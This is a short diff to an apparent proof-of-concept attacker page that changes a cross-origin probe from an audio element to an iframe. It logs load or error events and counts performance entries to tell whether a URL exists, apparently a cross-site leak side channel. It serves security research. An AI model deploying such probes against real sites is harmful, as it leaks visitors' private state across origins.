--- a/src/poc/attacker.html
+++ b/src/poc/attacker.html
@@ -4,14 +4,14 @@
     
     async function get_diff(url, status) {
       let start = performance.getEntries().length;
-      let sound = document.createElement('audio');
-      sound.src = url;
+      let element = document.createElement('iframe');
+      element.src = url;
 
       return new Promise((resolve) => {
-        sound.onload = () => {
+        element.onload = () => {
           console.log('exists');
         }
-        sound.onerror = () => {
+        element.onerror = () => {
           console.log('does not exist');
         }
       });
